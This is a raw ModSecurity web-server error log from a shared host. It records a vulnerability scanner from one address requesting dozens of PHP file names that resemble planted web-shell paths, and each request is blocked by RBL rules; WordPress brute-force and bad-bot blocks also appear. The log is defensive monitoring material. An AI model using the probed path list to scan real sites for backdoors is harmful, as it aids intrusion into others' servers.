[Tue May 26 19:06:53.498758 2026] [security2:error] [pid 6038:tid 6224] [client 20.104.227.76:10343] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/goods.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhTwAAAL0"]
[Tue May 26 19:06:53.647762 2026] [security2:error] [pid 6038:tid 6210] [client 20.104.227.76:10338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/info.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhVgAAAK8"]
[Tue May 26 19:06:53.647881 2026] [security2:error] [pid 6038:tid 6210] [client 20.104.227.76:10338] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/info.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhVgAAAK8"]
[Tue May 26 19:06:53.830682 2026] [security2:error] [pid 6038:tid 6239] [client 20.104.227.76:10309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/as.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhZQAAAMw"]
[Tue May 26 19:06:53.830780 2026] [security2:error] [pid 6038:tid 6239] [client 20.104.227.76:10309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/as.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhZQAAAMw"]
[Tue May 26 19:06:53.989888 2026] [security2:error] [pid 6038:tid 6180] [client 20.104.227.76:8331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/bb.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhbgAAAJE"]
[Tue May 26 19:06:53.990003 2026] [security2:error] [pid 6038:tid 6180] [client 20.104.227.76:8331] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/bb.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhbgAAAJE"]
[Tue May 26 19:06:54.215815 2026] [security2:error] [pid 6038:tid 6173] [client 20.104.227.76:10350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/about.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhgQAAAIo"]
[Tue May 26 19:06:54.215913 2026] [security2:error] [pid 6038:tid 6173] [client 20.104.227.76:10350] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/about.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhgQAAAIo"]
[Tue May 26 19:06:54.386041 2026] [security2:error] [pid 6038:tid 6240] [client 20.104.227.76:10351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/222.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhjwAAAM0"]
[Tue May 26 19:06:54.386197 2026] [security2:error] [pid 6038:tid 6240] [client 20.104.227.76:10351] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/222.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhjwAAAM0"]
[Tue May 26 19:06:54.572368 2026] [security2:error] [pid 6038:tid 6284] [client 20.104.227.76:10344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/test1.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhmgAAAPk"]
[Tue May 26 19:06:54.572496 2026] [security2:error] [pid 6038:tid 6284] [client 20.104.227.76:10344] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/test1.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhmgAAAPk"]
[Tue May 26 19:06:54.718993 2026] [security2:error] [pid 6038:tid 6247] [client 20.104.227.76:10334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp-mail.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhnwAAANQ"]
[Tue May 26 19:06:54.719106 2026] [security2:error] [pid 6038:tid 6247] [client 20.104.227.76:10334] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp-mail.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhnwAAANQ"]
[Tue May 26 19:06:54.928888 2026] [security2:error] [pid 6038:tid 6203] [client 20.104.227.76:10357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhswAAAKg"]
[Tue May 26 19:06:54.928970 2026] [security2:error] [pid 6038:tid 6203] [client 20.104.227.76:10357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhswAAAKg"]
[Tue May 26 19:06:55.096211 2026] [security2:error] [pid 6038:tid 6192] [client 20.104.227.76:10330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/adminfuns.php"] [unique_id "ahWh91HA3ZmGrHHEr4qhuAAAAJ0"]
[Tue May 26 19:06:55.096355 2026] [security2:error] [pid 6038:tid 6192] [client 20.104.227.76:10330] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/adminfuns.php"] [unique_id "ahWh91HA3ZmGrHHEr4qhuAAAAJ0"]
[Tue May 26 19:06:55.332815 2026] [security2:error] [pid 6038:tid 6248] [client 20.104.227.76:10340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/php8.php"] [unique_id "ahWh91HA3ZmGrHHEr4qhwAAAANU"]
[Tue May 26 19:06:55.332916 2026] [security2:error] [pid 6038:tid 6248] [client 20.104.227.76:10340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/php8.php"] [unique_id "ahWh91HA3ZmGrHHEr4qhwAAAANU"]
[Tue May 26 19:06:55.355929 2026] [security2:error] [pid 6038:tid 6245] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhrAAAANI"]
[Tue May 26 19:06:55.478562 2026] [security2:error] [pid 6038:tid 6252] [client 20.104.227.76:10306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/ioxi-o.php"] [unique_id "ahWh91HA3ZmGrHHEr4qhywAAANk"]
[Tue May 26 19:06:55.478694 2026] [security2:error] [pid 6038:tid 6252] [client 20.104.227.76:10306] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/ioxi-o.php"] [unique_id "ahWh91HA3ZmGrHHEr4qhywAAANk"]
[Tue May 26 19:06:55.648954 2026] [security2:error] [pid 6038:tid 6217] [client 171.37.191.178:10315] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWh91HA3ZmGrHHEr4qhygAAALY"]
[Tue May 26 19:06:55.657211 2026] [security2:error] [pid 6038:tid 6274] [client 20.104.227.76:8326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/edit.php"] [unique_id "ahWh91HA3ZmGrHHEr4qh2gAAAO8"]
[Tue May 26 19:06:55.657290 2026] [security2:error] [pid 6038:tid 6274] [client 20.104.227.76:8326] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/edit.php"] [unique_id "ahWh91HA3ZmGrHHEr4qh2gAAAO8"]
[Tue May 26 19:06:55.833946 2026] [security2:error] [pid 6038:tid 6263] [client 20.104.227.76:8341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/sid3.php"] [unique_id "ahWh91HA3ZmGrHHEr4qh5QAAAOQ"]
[Tue May 26 19:06:55.834058 2026] [security2:error] [pid 6038:tid 6263] [client 20.104.227.76:8341] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/sid3.php"] [unique_id "ahWh91HA3ZmGrHHEr4qh5QAAAOQ"]
[Tue May 26 19:06:56.001821 2026] [security2:error] [pid 6038:tid 6199] [client 20.104.227.76:10347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/166.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qh6gAAAKQ"]
[Tue May 26 19:06:56.001956 2026] [security2:error] [pid 6038:tid 6199] [client 20.104.227.76:10347] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/166.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qh6gAAAKQ"]
[Tue May 26 19:06:56.151668 2026] [security2:error] [pid 6038:tid 6267] [client 20.104.227.76:8364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/test.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qh9AAAAOg"]
[Tue May 26 19:06:56.151777 2026] [security2:error] [pid 6038:tid 6267] [client 20.104.227.76:8364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/test.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qh9AAAAOg"]
[Tue May 26 19:06:56.269837 2026] [security2:error] [pid 6038:tid 6209] [client 173.239.254.146:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWh9lHA3ZmGrHHEr4qhdQAArkU"]
[Tue May 26 19:06:56.409915 2026] [security2:error] [pid 6038:tid 6170] [client 20.104.227.76:8375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/phpinfo/info.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qh-gAAAIc"]
[Tue May 26 19:06:56.410066 2026] [security2:error] [pid 6038:tid 6170] [client 20.104.227.76:8375] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/phpinfo/info.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qh-gAAAIc"]
[Tue May 26 19:06:56.647675 2026] [security2:error] [pid 6038:tid 6240] [client 20.104.227.76:8339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp-the.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qiAgAAAM0"]
[Tue May 26 19:06:56.647800 2026] [security2:error] [pid 6038:tid 6240] [client 20.104.227.76:8339] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp-the.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qiAgAAAM0"]
[Tue May 26 19:06:56.811158 2026] [security2:error] [pid 6038:tid 6168] [client 20.104.227.76:10305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/CDX2.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qiBwAAAIU"]
[Tue May 26 19:06:56.811288 2026] [security2:error] [pid 6038:tid 6168] [client 20.104.227.76:10305] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/CDX2.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qiBwAAAIU"]
[Tue May 26 19:06:56.960362 2026] [security2:error] [pid 6038:tid 6230] [client 20.104.227.76:10329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/profile.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qiDgAAAMM"]
[Tue May 26 19:06:56.960495 2026] [security2:error] [pid 6038:tid 6230] [client 20.104.227.76:10329] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/profile.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qiDgAAAMM"]
[Tue May 26 19:06:57.000968 2026] [security2:error] [pid 6038:tid 6127] [remote 148.113.130.139:45820] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "masonicarkfoundation.in"] [uri "/robots.txt"] [unique_id "ahWh-VHA3ZmGrHHEr4qiDwAAnFg"]
[Tue May 26 19:06:57.001149 2026] [security2:error] [pid 6038:tid 6191] [client 148.113.130.139:45820] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "masonicarkfoundation.in"] [uri "/robots.txt"] [unique_id "ahWh-VHA3ZmGrHHEr4qiDwAAnFg"]
[Tue May 26 19:06:57.093850 2026] [security2:error] [pid 6038:tid 6126] [remote 5.42.158.148:41894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiEQAA_Vc"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:06:57.137326 2026] [security2:error] [pid 6038:tid 6119] [remote 3.208.180.187:56126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWh-FHA3ZmGrHHEr4qiCAAAnlA"]
[Tue May 26 19:06:57.146425 2026] [security2:error] [pid 6038:tid 6227] [client 20.104.227.76:8358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/ws80.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiGAAAAMA"]
[Tue May 26 19:06:57.146528 2026] [security2:error] [pid 6038:tid 6227] [client 20.104.227.76:8358] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/ws80.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiGAAAAMA"]
[Tue May 26 19:06:57.306473 2026] [security2:error] [pid 6038:tid 6171] [client 20.104.227.76:10705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/a4.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiGgAAAIg"]
[Tue May 26 19:06:57.306560 2026] [security2:error] [pid 6038:tid 6171] [client 20.104.227.76:10705] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/a4.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiGgAAAIg"]
[Tue May 26 19:06:57.457405 2026] [security2:error] [pid 6038:tid 6293] [client 20.104.227.76:10322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/buy.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiHAAAAQI"]
[Tue May 26 19:06:57.457550 2026] [security2:error] [pid 6038:tid 6293] [client 20.104.227.76:10322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/buy.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiHAAAAQI"]
[Tue May 26 19:06:57.461586 2026] [security2:error] [pid 6038:tid 6218] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiEwAAALc"]
[Tue May 26 19:06:57.603750 2026] [security2:error] [pid 6038:tid 6238] [client 20.104.227.76:10315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/core.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiKgAAAMs"]
[Tue May 26 19:06:57.603837 2026] [security2:error] [pid 6038:tid 6238] [client 20.104.227.76:10315] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/core.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiKgAAAMs"]
[Tue May 26 19:06:57.754534 2026] [security2:error] [pid 6038:tid 6130] [remote 195.250.23.247:42532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiJQAAoVs"]
[Tue May 26 19:06:57.813953 2026] [security2:error] [pid 6038:tid 6236] [client 20.104.227.76:10363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/lock360.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiMgAAAMk"]
[Tue May 26 19:06:57.814060 2026] [security2:error] [pid 6038:tid 6236] [client 20.104.227.76:10363] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/lock360.php"] [unique_id "ahWh-VHA3ZmGrHHEr4qiMgAAAMk"]
[Tue May 26 19:06:58.033294 2026] [security2:error] [pid 6038:tid 6262] [client 20.104.227.76:10325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/bc.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiMwAAAOM"]
[Tue May 26 19:06:58.033459 2026] [security2:error] [pid 6038:tid 6262] [client 20.104.227.76:10325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/bc.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiMwAAAOM"]
[Tue May 26 19:06:58.185871 2026] [security2:error] [pid 6038:tid 6168] [client 20.104.227.76:8340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/av.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiPQAAAIU"]
[Tue May 26 19:06:58.185996 2026] [security2:error] [pid 6038:tid 6168] [client 20.104.227.76:8340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/av.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiPQAAAIU"]
[Tue May 26 19:06:58.360275 2026] [security2:error] [pid 6038:tid 6214] [client 20.104.227.76:10712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/xs.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiPwAAALM"]
